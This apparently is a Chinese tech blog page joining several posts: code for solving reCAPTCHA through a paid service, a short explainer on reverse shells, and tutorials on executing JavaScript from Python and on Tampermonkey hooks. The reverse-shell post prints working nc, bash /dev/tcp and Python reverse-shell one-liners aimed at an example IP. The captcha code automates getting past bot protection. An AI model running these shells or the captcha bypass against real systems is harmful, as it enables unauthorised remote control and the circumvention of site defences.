entire_captcha_natural_width：验证码图片对应的图片真实大小，这里如果是 3x3 的验证码图片，那么图片的真实大小就是 300，如果是 4x4 的验证码图片，那么图片的真实大小是 450
captcha_target_name：识别目标名称，就是刚才获取到的内容
entire_captcha_element：验证码图片对应的节点对象。

这里我们先把 entire_captcha_element 里面的 img 节点拿到，然后将 img 的 src 内容获取下来，赋值为 entire_captcha_url，这样其实就得到了一张完整的验证码大图，然后我们将其写入到文件中。

结果就类似这样的：

接着我们把这个图片发给 YesCaptcha 进行识别就好了。

Base64 编码

接着，我们把这张图片转下 Base64 编码，定义这样一个方法：

def resize_base64_image(filename, size):
    width, height = size
    img = Image.open(filename)
    new_img = img.resize((width, height))
    new_img.save(CAPTCHA_RESIZED_IMAGE_FILE_PATH)
    with open(CAPTCHA_RESIZED_IMAGE_FILE_PATH, "rb") as f:
        data = f.read()
        encoded_string = base64.b64encode(data)
        return encoded_string.decode('utf-8')

这里值得注意的是，由于 API 对图片大小有限制，如果是 3x3 的图片，那么我们需要将图片调整成 300x300 才可以，如果是 4x4 的图片，那么我们需要将图片调整成 450x450，所以这里我们先调用了 Image 的 resize 方法调整了大小，接着再转成了 Base64 编码。

问题 ID 处理

那问题 ID 怎么处理呢？通过 API 文档 https://yescaptcha.atlassian.net/wiki/spaces/YESCAPTCHA/pages/18055169 我们可以看到如下映射表：

所以，比如假如验证码里面我们得到的是 traffic lights，那么问题 ID 就是 /m/015qff，行，那我们反向查找就好了，定义这么个方法：

CAPTCHA_TARGET_NAME_QUESTION_ID_MAPPING = {
    "taxis": "/m/0pg52",
    "bus": "/m/01bjv",
    "school bus": "/m/02yvhj",
    "motorcycles": "/m/04_sv",
    "tractors": "/m/013xlm",
    "chimneys": "/m/01jk_4",
    "crosswalks": "/m/014xcs",
    "traffic lights": "/m/015qff",
    "bicycles": "/m/0199g",
    "parking meters": "/m/015qbp",
    "cars": "/m/0k4j",
    "vehicles": "/m/0k4j",
    "bridges": "/m/015kr",
    "boats": "/m/019jd",
    "palm trees": "/m/0cdl1",
    "mountains or hills": "/m/09d_r",
    "fire hydrant": "/m/01pns0",
    "fire hydrants": "/m/01pns0",
    "a fire hydrant": "/m/01pns0",
    "stairs": "/m/01lynh",
}


def get_question_id_by_target_name(target_name):
    logger.debug(f'try to get question id by {target_name}')
    question_id = CAPTCHA_TARGET_NAME_QUESTION_ID_MAPPING.get(target_name)
    logger.debug(f'question_id {question_id}')
    return question_id

这样传入名称，我们就可以得到问题 ID 了。

最后将上面的参数直接调用 CaptchaResovler 对象的 create_task 方法就能得到识别结果了。

模拟点击

得到结果之后，我们知道返回结果的 objects 就是需要点击的验证码格子的列表，下面进行模拟点击即可：

single_captcha_elements = self.wait.until(EC.visibility_of_all_elements_located(
          (By.CSS_SELECTOR, '#rc-imageselect-target table td')))
for recognized_index in recognized_indices:
    single_captcha_element: WebElement = single_captcha_elements[recognized_index]
    single_captcha_element.click()
    # check if need verify single captcha
    self.verify_single_captcha(recognized_index)

这里我们首先得到了 recognized_indices 就是识别结果对应的标号，然后逐个遍历进行模拟点击。

对于每次点击，我们可以直接获取所有的验证码格子对应的节点，然后调用其 click 方法就可以完成点击了，其中格子的标号和返回结果的对应关系如图：

当然我们也可以通过执行 JavaScript 来对每个节点进行模拟点击，效果是类似的。

这样我们就可以实现验证码小图的逐个识别了。

小图识别

等等，在识别过程中还发现了一个坑，那就是有时候我们点击完一个小格子之后，这个小格子就消失了！然后在原来的小格子的位置出现了一个新的小图，我们需要对新出现的图片进行二次识别才可以。

这个怎么处理呢？

我们其实可以在每点击完一个格子之后就来校验下当前小格子有没有图片刷新，如果有图片刷新，那么对应的 HTML 的 class 就会变化，否则就会包含 selected 字样，然后我们再继续对小格子对应的图进行二次识别就好了。

这里我们再定义一个方法：

def verify_single_captcha(self, index):
    time.sleep(3)
    elements = self.wait.until(EC.visibility_of_all_elements_located(
        (By.CSS_SELECTOR, '#rc-imageselect-target table td')))
    single_captcha_element: WebElement = elements[index]
    class_name = single_captcha_element.get_attribute('class')
    logger.debug(f'verifiying single captcha {index}, class {class_name}')
    if 'selected' in class_name:
        logger.debug(f'no new single captcha displayed')
        return
    logger.debug('new single captcha displayed')
    single_captcha_url = single_captcha_element.find_element_by_css_selector(
            'img').get_attribute('src')
    logger.debug(f'single_captcha_url {single_captcha_url}')
    with open(CAPTCHA_SINGLE_IMAGE_FILE_PATH, 'wb') as f:
        f.write(requests.get(single_captcha_url).content)
    resized_single_captcha_base64_string = resize_base64_image(
        CAPTCHA_SINGLE_IMAGE_FILE_PATH, (100, 100))
    single_captcha_recognize_result = self.captcha_resolver.create_task(
        resized_single_captcha_base64_string, get_question_id_by_target_name(self.captcha_target_name))
    if not single_captcha_recognize_result:
        logger.error('count not get single captcha recognize result')
        return
    has_object = single_captcha_recognize_result.get(
        'solution', {}).get('hasObject')
    if has_object is None:
        logger.error('count not get captcha recognized indices')
        return
    if has_object is False:
        logger.debug('no more object in this single captcha')
        return
    if has_object:
        single_captcha_element.click()
        # check for new single captcha
        self.verify_single_captcha(index)

OK，这里我们定义了一个 verify_single_captcha 方法，然后传入了格子对应的序号。接着我们首先尝试查找格子对应的节点，然后找出对应的 HTML 的 class 属性。如果没有出现新的小图，那就是这样的选中状态，对应的 class 就包含了 selected 字样，如图所示：

对于这样的图片，我们就不需要进行二次验证，否则就需要对这个格子进行截图和二次识别。

二次识别的步骤也是一样的，我们需要将小格子对应的图片单独获取其 url，然后下载下来，接着调整大小并转化成 Base64 编码，然后发给 API，API 会通过一个 hasObject 字段告诉我们这个小图里面是否包含我们想要识别的目标内容，如果是，那就接着点击，然后递归进行下一次检查，如果不是，那就跳过。

点击验证

好，那么有了上面的逻辑，我们就能完成整个 ReCAPTCHA 的识别和点选了。

最后，我们模拟点击验证按钮就好了：

def get_verify_button(self) -> WebElement:
    verify_button = self.wait.until(EC.presence_of_element_located(
        (By.CSS_SELECTOR, '#recaptcha-verify-button')))
    return verify_button

# after all captcha clicked
verify_button: WebElement = self.get_verify_button()
if verify_button.is_displayed:
    verify_button.click()
    time.sleep(3)

校验结果

点击完了之后，我们可以尝试检查网页变化，看看有没有验证成功。

比如验证成功的标志就是出现一个绿色小对勾：

检查方法如下：

def get_is_successful(self):
    self.switch_to_captcha_entry_iframe()
    anchor: WebElement = self.wait.until(EC.visibility_of_element_located((
        By.ID, 'recaptcha-anchor'
    )))
    checked = anchor.get_attribute('aria-checked')
    logger.debug(f'checked {checked}')
    return str(checked) == 'true'

这里我们先切换了 iframe，然后检查了对应的 class 是否是符合期望的。

最后如果 get_is_successful 返回结果是 True，那就代表识别成功了，那就整个完成了。

如果返回结果是 False，我们可以进一步递归调用上述逻辑进行二次识别，直到识别成功即可。

代码

以上代码可能比较复杂，这里我将代码进行了规整，然后放到 GitHub 上了，大家如有需要可以自取：https://github.com/Python3WebSpider/RecaptchaResolver

注册地址

最后需要说明一点，上面的验证码服务是收费的，每验证一次可能花一定的点数，比如识别一次 3x3 的图要花 10 点数，而充值一块钱就能获得 1000 点数，所以识别一次就一分钱，还是比较便宜的。

我这里充值了好几万点数，然后我就变成了 VIP5 级的账号。我研究了下发现大家如果用我的邀请链接 https://yescaptcha.com/i/CnZPBu 注册大家可以直接变成 VIP4，然后 VIP4 可以获取首充赠送 10% 的优惠，还不错哈～

希望本文对大家有帮助。

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2022-05-26 阅读次数：本文字数： 13k 阅读时长 ≈ 12 分钟

技术杂谈 什么是反弹 Shell？

前段时间被一位产品经理嘲笑了，说我居然连反弹 Shell 都不知道！

说实话当时我还真不知道，但这口气咽不下去啊，得赶紧学来看看，这不，我已经学会了！

学完之后我特地来记录下，同时分享给大家，以后产品经理再也不敢嘲笑我们不懂反弹 Shell 了！

什么是反弹 Shell

我们都知道 Shell 的概念吧，简单来说，Shell 就是实现用户命令的接口，通过这个接口我们就能实现对计算机的控制，比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制。

那反弹 Shell 是啥呢？其英文名叫做 Reverse Shell，具体干什么的呢？就是控制端首先监听某个 TCP/UDP 端口，然后被控制端向这个端口发起一个请求，同时将自己命令行的输入输出转移到控制端，从而控制端就可以输入命令来控制被控端了。

比如说，我们有两台主机 A、B，我们最终想实现在 A 上控制 B。那么如果用正向 Shell，其实就是在 A 上输入 B 的连接地址，比如通过 ssh 连接到 B，连接成功之后，我们就可以在 A 上通过命令控制 B 了。如果用反向 Shell，那就是在 A 上先开启一个监听端口，然后让 B 去连接 A 的这个端口，连接成功之后，A 这边就能通过命令控制 B 了。

反弹 Shell 有什么用？

还是原来的例子，我们想用 A 来控制 B，如果想用 ssh 等命令来控制，那得输入 B 的 sshd 地址或者端口对吧？但是在很多情况下，由于防火墙、安全组、局域网、NAT 等原因，我们实际上是无法直接连接到 B 的，比如：

A 虽然有公网 IP，但 B 是一个处于内网的机器，A 就没法直接连到 B 上。
B 上开了防火墙或者安全组限制，sshd 的服务端口 22 被封闭了。
B 是一台拨号主机，其 IP 地址经常变动。
假如 B 被攻击了，我们想让 B 向 A 汇报自己的状况，那自然就需要 B 主动去连接 A。

如果是这些情况，我们就可以用反弹 Shell 用 A 来控制 B 了。

反弹 Shell 案例

首先我们先看一个标准的反弹 Shell 的例子，这里我们一共需要两台主机：

A 是控制端，可以处于公网之中，也可以和 B 处于一个局域网中，总之能让 B 找到 A 就行。
B 是被控端，可以处在局域网之中。

在开始之前我们需要用到 nc 命令，安装非常简单。

如果是 CentOS 系列系统，安装命令如下：

1	yum install -y nc # CentOS

如果是 Ubuntu 系列系统，安装命令可以参考 https://stackoverflow.com/questions/10065993/how-to-switch-to-netcat-traditional-in-ubuntu。

接着，我们在 A 上执行如下命令：

1	nc -lvp 32767

这个命令的意思是开启 32767 的端口监听，运行之后如图所示：

这样就表明 A 上正在监听 32767 端口的连接了。

这时候，我们可以在 B 上通过类似的命令连接到 A，假如 A 的 IP 是 111.112.113.114，那么命令如下：

1	nc 111.112.113.114 32767 -e /bin/bash

注意：你在运行的时候需要替换成 A 的真实 IP 和端口。

运行完毕之后，我们反过来观察下 A，就显示了来自某个 IP 和端口的连接，我们就可以输入命令来控制 B 了，比如这里我们输入了：

uname -a

然后就可以得到 B 的主机名了。

如图所示：

这样我们就通过 nc 包实现了反弹 Shell。

有人说，这 B 上一定需要安装 nc 这个包吗？其实不一定的，我们可以直接使用 bash 来实现反弹 Shell，命令如下：

1	bash -i >& /dev/tcp/111.112.113.114/32767 0>&1

这个命令大致解释下：

bash -i 就是产生一个 bash 交互环境
>& 可以将 bash 交互环境的输入、输出、错误输出都输出到一个地方
/dev/tcp/111.112.113.114/32767 其实指的就是目标主机的一个连接地址，因为 Linux 环境中所有内容的定义都是以文件的形式存在的，指定这个地址就是让主机和目标主机建立一个 TCP 连接。
0>&1可以将标准输入和标准输出相结合，重定向给前面标准输出的内容。

通过这样的命令，我们就可以就是将 B 的标准输出和错误输出都重定向给 A，并且将 A 的输入都重定向给 B，这样我们就可以实现 A 对 B 的远程控制了，如图所示：

比如这样我们就可以轻松在 A 主机上拿到 B 主机的主机名、当前所处路径等内容了。

另外除了用 bash，我们还可以利用 Python 进行反弹 Shell，脚本如下：

python -c 'import socket,subprocess,os; \
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("111.112.113.114",32767));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

可以达到同样反弹 Shell 的效果，即可以用 A 来控制 B。

总结

以上就是反弹 Shell 的介绍，灵活运用反弹 Shell 可以大大便利某些场景下的远程控制，希望对大家有帮助。

更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2022-04-17 阅读次数：本文字数： 2.2k 阅读时长 ≈ 2 分钟

Python 【2022 年】崔庆才 Python3 网络爬虫学习教程

大家好，我是崔庆才，非常高兴能在此处与您相见，无论您对爬虫有所涉猎还是初学爬虫，我希望我撰写的本 Python 爬虫系列教程能对您有所帮助。

要学爬虫，首推的就是 Python 语言，简单快速易上手，且 Python 语言的爬虫生态极其丰富。

我个人于 2015 年研究 Python 爬虫技术，并于 2018 年出版了个人第一版爬虫书《Python3 网络爬虫开发实战》，出版至今，此本书一直处于市面上所有爬虫书的销冠位置，销量 10w 册，豆瓣评分 9.0。

Python 爬虫技术的基本内容包括网页基础分析、requests 请求、XPath 和正则解析、Ajax 分析、Selenium 模拟浏览器爬取、Scrapy 等知识点，但技术不是一成不变的，随着近几年时代的发展，一些新兴爬虫技术如异步爬虫、JavaScript 逆向、AST 技术、安卓逆向、Hook、智能解析、WebAssembly、大规模分布式、Docker、Kubernetes 等技术不断涌现，而现在网上的爬虫文章也存在着极大问题，一个是内容泛滥不堪、同质化严重，另一个是几乎没有几篇博文能紧跟前沿技术，多数还停留在几年前的水平，而且很多爬虫教程所用案例已经非常老旧而且多数也无法运行，这极大地打击了初学者的自信心。

因此，2022 年了，有一套内容全面的、紧跟前沿技术的、案例稳定运行的爬虫教程可谓是非常难得。

是的，所以在 2021 年底，我又出版了《Python3 网络爬虫开发实战（第二版）》，对旧的爬虫技术内容进行了全面更新，搭建了全新的案例平台进行全面讲解，

目前截止 2022 年，可以将爬虫基本技术进行系统讲解，同时将最新前沿爬虫技术如异步、JavaScript 逆向、AST、安卓逆向、Hook、智能解析、群控技术、WebAssembly、大规模分布式、Docker、Kubernetes 等，市面上目前就这一套教程了，当然书的话也仅有《Python3 网络爬虫开发实战（第二版）》可以做到。

本教程内容多数来自于《Python3 网络爬虫开发实战（第二版）》，本教程对书中内容进行了精简和梳理，尽量覆盖到最新的知识点，当然更全面的内容可以购买《Python3 网络爬虫开发实战（第二版）》一书了解更多。

以下为 Python3 网络爬虫学习教程内容：

爬虫基础入门

页面解析和数据存储

Ajax 分析和动态渲染页面爬取

异步爬虫和模拟登录

验证码的处理

代理的使用

JavaScript 混淆、逆向技术

App 爬虫和安卓逆向

页面智能解析

Scrapy 框架和分布式爬虫

爬虫的部署、维护、监控

作者崔庆才发表于 2022-03-13 阅读次数：本文字数： 1.5k 阅读时长 ≈ 1 分钟

Python 【2022 年】Python3 爬虫教程 - Python 模拟执行 JavaScript

爬虫系列文章总目录：【2022 年】Python3 爬虫学习教程，本教程内容多数来自于《Python3 网络爬虫开发实战（第二版）》一书，目前截止 2022 年，可以将爬虫基本技术进行系统讲解，同时将最新前沿爬虫技术如异步、JavaScript 逆向、AST、安卓逆向、Hook、智能解析、群控技术、WebAssembly、大规模分布式、Docker、Kubernetes 等，市面上目前就仅有《Python3 网络爬虫开发实战（第二版）》一书了，点击了解详情。

前面我们了解了一些 JavaScript 逆向的调试技巧，通过一些方法，我们可以找到一些突破口，进而找到关键的方法定义。

比如说，通过一些调试，我们找到了一个加密参数 token 是由某一个叫做 encrypt 方法产生的，如果里面的逻辑相对简单的话，那其实我们可以用 Python 完全重写一遍。但是现实情况往往不是这样的，一般来说，一些加密相关的方法通常会引用一些相关标准库，比如说 JavaScript 就有一个广泛使用的库，叫做 crypto-js，GitHub 仓库链接是：https://github.com/brix/crypto-js，这个库实现了很多主流的加密算法，包括对称加密、非对称加密、字符编码等等，比如对于 AES 加密，通常我们需要输入待加密文本和加密密钥，实现如下：

1	const ciphertext = CryptoJS.AES.encrypt(message, key).toString();

对于这样的情况，我们其实就没法很轻易地完全重写一遍了，因为 Python 中并不一定有和 JavaScript 完全一样的类库。

那有什么解决办法吗？有的，既然 JavaScript 已经实现好了，那我用 Python 直接模拟执行这些 JavaScript 得到结果不就好了吗？

所以，本节我们就来了解下使用 Python 模拟执行 JavaScript 的解决方案。

1. 案例引入

这里我们先看一个和上文描述的情形非常相似的案例，链接是：https://spa7.scrape.center/，如图所示：

这是一个 NBA 球星网站，用卡片的形式展示了一些球星的基本信息，另外每一张卡片上其实都有一个加密字符串，这个加密字符串其实和球星的相关信息是有关联的，每个球星的加密字符串也是不同的。

所以，这里我们要做的就是找出这个加密字符串的加密算法并用程序把加密字符串的生成过程模拟出来。

2. 准备工作

由于本节我们需要使用 Python 模拟执行 JavaScript，这里我们使用的库叫做 PyExecJS，我们使用 pip3 安装即可，命令如下：

1	pip3 install pyexecjs

PyExecJS 是用于执行 JavaScript 的，但执行 JavaScript 的功能需要依赖一个 JavaScript 运行环境，所以除了安装好这个库之外，我们还需要安装一个 JavaScript 运行环境，个人比较推荐的是 Node.js，所以我们还需要安装下 Node.js，可以到 https://nodejs.org/ 下载安装。更加详细的安装和配置过程可以参考：https://setup.scrape.center/pyexecjs。

PyExecJS 库在运行时会检测本地 JavaScript 运行环境来实现 JavaScript 执行，做好如上准备工作之后，接着我们运行代码检查一下运行环境：

1 2	import execjs print(execjs.get().name)

运行结果类似如下：

1	Node.js (V8)

如果你成功安装好 PyExecJS 库和 Node.js 的话，其结果就是 Node.js (V8)，当然如果你安装的是其他的 JavaScript 运行环境，结果也会有所不同。

3. 分析

接下来我们就对这个网站稍作分析，打开 Sources 面板，我们可以非常轻易地找到加密字符串的生成逻辑，如图所示：

首先声明了一个球员相关的列表，如：

const players = [
  {
    name: '凯文-杜兰特',
    image: 'durant.png',
    birthday: '1988-09-29',
    height: '208cm',
    weight: '108.9KG'
  }
  ...
]

然后对于每一个球员，都把每个球员的信息调用了加密算法进行了加密，我们可以打个断点看下：

这里我们可以看到，getToken 方法的输入就是单个球员的信息，就是上述列表的一个元素对象，然后 this.key 就是一个固定的字符串。整个加密逻辑就是提取了球员的名字、生日、身高、体重，然后先 Base64 编码然后再进行 DES 加密，最后返回结果。

加密算法是怎么实现的呢？其实就是依赖了 crypto-js 库，使用了 CryptoJS 对象来实现的。

那 CryptoJS 这个对象是哪里来的呢？总不能凭空产生吧？其实这个网站就是直接引用了这个库，如图所示：

引用这个 JavaScript 文件之后，CryptoJS 就被注入到浏览器全局环境下了，因此我们就可以在别的方法里面直接使用 CryptoJS 对象里面的方法了。

4. 模拟调用

好，那既然这样，我们要怎么模拟呢？下面我们来实现下。

首先，我们要模拟的其实就是这个 getToken 方法，输入球员相关信息，得到最终的加密字符串，这里我们直接把 key 替换下，把 getToken 方法稍微改写如下：

function getToken(player) {
  let key = CryptoJS.enc.Utf8.parse("fipFfVsZsTda94hJNKJfLoaqyqMZFFimwLt");
  const { name, birthday, height, weight } = player;
  let base64Name = CryptoJS.enc.Base64.stringify(CryptoJS.enc.Utf8.parse(name));
  let encrypted = CryptoJS.DES.encrypt(
    `${base64Name}${birthday}${height}${weight}`,
    key,
    {
      mode: CryptoJS.mode.ECB,
      padding: CryptoJS.pad.Pkcs7,
    }
  );
  return encrypted.toString();
}

因为这个方法的模拟执行是需要 CryptoJS 这个对象的，如果我们直接调用这个方法肯定会报 CryptoJS 未定义的错误。

那怎么办呢？我们只需要再模拟执行下刚才看到的 crypto-js.min.js 不就好了吗？

OK，所以，我们需要模拟执行的内容就是两部分：

模拟运行 crypto-js.min.js 里面的 JavaScript，用于声明 CryptoJS 对象。
模拟运行 getToken 方法的定义，用于声明 getToken 方法。

好，接下来我们就把 crypto-js.min.js 里面的代码和上面 getToken 方法的代码复制一下，都粘贴到一个 JavaScript 文件里面，比如就叫做 crypto.js。

接下来我们就用 PyExecJS 模拟执行一下吧，代码如下：

import execjs
import json

item = {
    'name': '凯文-杜兰特',
    'image': 'durant.png',
    'birthday': '1988-09-29',
    'height': '208cm',
    'weight': '108.9KG'
}

file = 'crypto.js'
node = execjs.get()
ctx = node.compile(open(file).read())

js = f"getToken({json.dumps(item, ensure_ascii=False)})"
print(js)
result = ctx.eval(js)
print(result)

这里我们单独定义了一位球员的信息，赋值为 item 变量。然后使用 execjs 的 get 方法获取了 JavaScript 执行环境，赋值为 node。

接着我们调用了 node 的 compile 方法，传入了刚才定义的 crypto.js 文件的文本内容，compile 方法会返回一个 JavaScript 的上下文对象，我们赋值为 ctx。执行到这里，其实就可以理解为，ctx 对象里面就执行过了 crypto-js.min.js，CryptoJS 就声明好了，然后也执行过了 getToken 的定义，所以 getToken 方法也定义好了，相当于完成了一些初始化的工作。

接着，我们只需要定义好我们想要执行的 JavaScript 代码就好了，我们定义了一个 js 变量，其实就是模拟调用了 getToken 方法并传入了球员信息，我们打印了下 js 变量的值，内容如下：

1	getToken({"name": "凯文-杜兰特", "image": "durant.png", "birthday": "1988-09-29", "height": "208cm", "weight": "108.9KG"})

其实这就是一个标准的 JavaScript 方法调用的写法而已。

接着我们调用 ctx 对象的 eval 方法并传入 js 变量，其实就是模拟执行了这句 JavaScript 代码，照理来说最终返回的就是加密字符串了。

然而，运行之后，我们可能看到这个报错：

1	execjs._exceptions.ProgramError: ReferenceError: CryptoJS is not defined

很奇怪，CryptoJS 未定义？我们明明执行过 crypto-js.min.js 里面的内容了呀？

问题其实出在 crypto-js.min.js 里面，可以看到其里面声明了一个 JavaScript 的自执行方法，如图所示：

自执行方法什么意思呢？就是声明了一个方法，然后紧接着调用执行，我们可以看下这个例子：

1
2
3

!(function (a, b) {
  console.log("result", a, b);
})(1, 2);

这里我们先声明了一个 function，然后接收 a 和 b 两个参数，然后把内容输出出来，然后我们把这个 function 用小括号括起来，这其实就是一个方法，可以被直接调用的，怎么调用呢？后面再跟上对应的参数就好了，比如传入 1 和 2，执行结果如下：

1	result 1 2

可以看到，这个自执行的方法就被执行了。

同理地，crypto-js.min.js 也符合这个格式，它接收 t 和 e 两个参数，t 就是 this，其实就是浏览器中的 window 对象，e 就是一个 function（用于定义 CryptoJS 的核心内容）。

我们再来观察下 crypto-js.min.js 开头的定义：

"object" == typeof exports
  ? (module.exports = exports = e())
  : "function" == typeof define && define.amd
  ? define([], e)
  : (t.CryptoJS = e());

在 Node.js 中，其实 exports 就是用来将一些对象的定义进行导出的，这里 "object" == typeof exports 其实结果就是 true，所以就执行了 module.exports = exports = e() 这段代码，这样就相当于把 e() 作为整体导出了，而这个 e() 其实就对应这后面的整个 function，function 里面定义了加密相关的各个实现，其实就指代整个加密算法库。

但是在浏览器中，其结果就不一样了，浏览器环境中并没有 exports 和 define 这两个对象。所以，上述代码在浏览器中最后执行的就是 t.CryptoJS = e() 这段代码，其实这里就是把 CryptoJS 对象挂载到 this 对象上面，而 this 就是浏览器中的全局 window 对象，后面就可以直接用了。如果我们把代码放在浏览器中运行，那是没有任何问题的。

然而，我们使用的 PyExecJS 是依赖于一个 Node.js 执行环境的，所以上述代码其实执行的是 module.exports = exports = e()，这里面并没有声明 CryptoJS 对象，也没有把 CryptoJS 挂载到全局对象里面，所以后面我们再调用 CryptoJS 就自然而然出现了未定义的错误了。

那怎么办呢？其实很简单，那我们直接声明一个 CryptoJS 变量，然后手动声明一下它的初始化不就好了吗？所以我们可以把代码稍作修改，改成如下内容：

var CryptoJS;
!(function (t, e) {
  CryptoJS = e();
  "object" == typeof exports
    ? (module.exports = exports = e())
    : "function" == typeof define && define.amd
    ? define([], e)
    : (t.CryptoJS = e());
})(this, function () {
  //...
});

这里我们就首先声明了一个 CryptoJS 变量，然后直接给 CryptoJS 变量赋值给 e()，这样就完成了 CryptoJS 的初始化。

这样我们再重新运行刚才的 Python 脚本，就可以得到执行结果了：

1	gQSfeqldQIJKAZHH9TzRX/exvIwb0j73b2cjXvy6PeZ3rGW6sQsL2w==

这样我们就成功得到加密字符串了，和示例网站上显示的是一模一样的，这样我们就成功模拟 JavaScript 的调用完成了某个加密算法的运行过程。

5. 总结

本节介绍了利用 PyExecJS 来模拟执行 JavaScript 的方法，结合一个案例来完成了整个的实现和问题排查的过程。本节内容还是比较重要的，以后我们如果需要模拟执行 JavaScript 就可以派得上用场。

本节代码；https://github.com/Python3WebSpider/ScrapeSpa7。

作者崔庆才发表于 2022-03-12 阅读次数：本文字数： 5.8k 阅读时长 ≈ 5 分钟

Python 【2022 年】Python3 爬虫教程 - JavaScript Hook 的用法

系列文章总目录：【2022 年】Python3 爬虫学习教程，本教程内容多数来自于《Python3 网络爬虫开发实战（第二版）》一书，目前截止 2022 年，可以将爬虫基本技术进行系统讲解，同时将最新前沿爬虫技术如异步、JavaScript 逆向、AST、安卓逆向、Hook、智能解析、群控技术、WebAssembly、大规模分布式、Docker、Kubernetes 等，市面上目前就仅有《Python3 网络爬虫开发实战（第二版）》一书了，点击了解详情。

在 JavaScript 逆向的时候，我们经常需要追踪某些方法的堆栈调用情况。但在很多情况下，一些 JavaScript 的变量或者方法名经过混淆之后是非常难以捕捉的。上一节我们介绍了一些断点调试、调用栈查看等技巧，但仅仅凭借这些技巧还不足以应对多数 JavaScript 逆向。

本节我们再来介绍一个比较常用的 JavaScript 逆向技巧 —— Hook 技术。

1. Hook 技术

Hook 技术中文又叫作钩子技术，指在程序运行的过程中，对其中的某个方法进行重写，在原先的方法前后加入我们自定义的代码。相当于在系统没有调用该函数之前，钩子程序就先捕获该消息，得到控制权，这时钩子函数既可以加工处理（改变）该函数的执行行为，也可以强制结束消息的传递。

要对 JavaScript 代码进行 Hook 操作，就需要额外在页面中执行一些自定义的有关 Hook 逻辑的代码。那么问题来了？怎样才能在浏览器中方便地执行我们所期望执行的 JavaScript 代码呢？在这里推荐一个插件，叫作 Tampermonkey。这个插件的功能非常强大，利用它我们几乎可以在网页中执行任何 JavaScript 代码，实现我们想要的功能。

下面我们就来介绍一下这个插件的使用方法，并结合一个实际案例，介绍一下这个插件在 JavaScript Hook 中的用途。

2. Tampermonkey

Tampermonkey，中文也叫作“油猴”，它是一款浏览器插件，支持 Chrome。利用它我们可以在浏览器加载页面时自动执行某些 JavaScript 脚本。由于执行的是 JavaScript，所以我们几乎可以在网页中完成任何我们想实现的效果，如自动爬虫、自动修改页面、自动响应事件等。

其实，Tampermonkey 的用途远远不止这些，只要我们想要的功能能用 JavaScript 实现，Tampermonkey 就可以帮我们做到。比如我们可以将 Tampermonkey 应用到 JavaScript 逆向分析中，去帮助我们更方便地分析一些 JavaScript 加密和混淆代码。

3. 安装

首先我们需要安装 Tampermonkey，这里我们使用的浏览器是 Chrome。直接在 Chrome 应用商店或者在 Tampermonkey 的官网 https://www.tampermonkey.net/ 下载安装即可。

安装完成之后，在 Chrome 浏览器的右上角会出现 Tampermonkey 的图标，这就代表安装成功了，如图所示。

4. 获取脚本

Tampermonkey 运行的是 JavaScript 脚本，每个网站都能有对应的脚本运行，不同的脚本能完成不同的功能。这些脚本我们可以自定义，也可以用已经写好的很多脚本，毕竟有些轮子有了，我们就不需要再去造了。

我们可以在 https://greasyfork.org/zh-CN/scripts 找到一些非常实用的脚本，如全网视频去广告、百度云全网搜索等，大家可以体验一下。

5. 脚本编写

除了使用别人已经写好的脚本，我们也可以自己编写脚本来实现想要的功能。编写脚本难不难呢？其实就是写 JavaScript 代码，只要懂一些 JavaScript 的语法就好了。另外我们需要遵循脚本的一些写作规范，其中就包括一些参数的设置。

下面我们就简单实现一个小的脚本。首先我们可以点击 Tampermonkey 插件图标，再点击“管理面板”按钮，打开脚本管理页面，如图所示。

脚本管理页面如图所示。

在这里显示了我们已经有的一些 Tampermonkey 脚本，包括我们自行创建的，也包括从第三方网站下载安装的。另外这里提供了编辑、调试、删除等管理功能，在这里可以方便地对脚本进行管理。

接下来我们来创建一个新的脚本，点击左侧的“+”号，会显示如图所示的页面。

初始化的代码如下：

// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        https://www.tampermonkey.net/documentation.php?ext=dhdg
// @grant        none
// ==/UserScript==

(function () {
  "use strict";

  // Your code here...
})();

在上面这段代码里，最前面是一些注释，它们非常有用，这部分内容叫作 UserScript Header ，我们可以在里面配置一些脚本的信息，如名称、版本、描述、生效站点等等。

下面简单介绍一下 UserScript Header 的一些参数定义。

@name：脚本的名称，就是在控制面板显示的脚本名称。
@namespace：脚本的命名空间。
@version：脚本的版本，主要是做版本更新时用。
@author：作者。
@description：脚本描述。
@homepage、 @homepageURL、 @website、@source：作者主页，用于在 Tampermonkey 选项页面上从脚本名称点击跳转。请注意，如果 @namespace 标记以 http://开头，此处也要一样。
@icon、 @iconURL 、@defaulticon：低分辨率图标。
@icon64 、 @icon64URL：64 × 64 高分辨率图标。
@updateURL：检查更新的网址，需要定义 @version。
@downloadURL：更新下载脚本的网址，如果定义成 none 就不会检查更新。
@supportURL：报告问题的网址。

@include：生效页面，可以配置多个，但注意这里并不支持 URL Hash。

例如：

// @include http://www.tampermonkey.net/*
// @include http://*
// @include https://*
// @include *

@match：约等于 @include 标签，可以配置多个。
@exclude：不生效页面，可配置多个，优先级高于 @include 和 @match。

@require：附加脚本网址，相当于引入外部的脚本，这些脚本会在自定义脚本执行之前执行，比如引入一些必须的库，如 jQuery 等，这里可以支持配置多个 @require 参数。

例如：

1
2
3

// @require https://code.jquery.com/jquery-2.1.4.min.js
// @require https://code.jquery.com/jquery-2.1.3.min.js#sha256=23456...
// @require https://code.jquery.com/jquery-2.1.2.min.js#md5=34567...,sha256=6789...

@resource：预加载资源，可通过 GM_getResourceURL 和 GM_getResourceText 读取。
@connect：允许被 GM_xmlhttpRequest 访问的域名，每行 1 个。
@run-at：脚本注入的时刻，如页面刚加载时，某个事件发生后等。
- document-start：尽可能地早执行此脚本。
- document-body：DOM 的 body 出现时执行。
- document-end：DOMContentLoaded 事件发生时或发生后执行。
- document-idle：DOMContentLoaded 事件发生后执行，即 DOM 加载完成之后执行，这是默认的选项。
- context-menu：如果在浏览器上下文菜单（仅限桌面 Chrome 浏览器）中点击该脚本，则会注入该脚本。注意：如果使用此值，则将忽略所有 @include 和 @exclude 语句。

@grant：用于添加 GM 函数到白名单，相当于授权某些 GM 函数的使用权限。

例如：

// @grant GM_setValue
// @grant GM_getValue
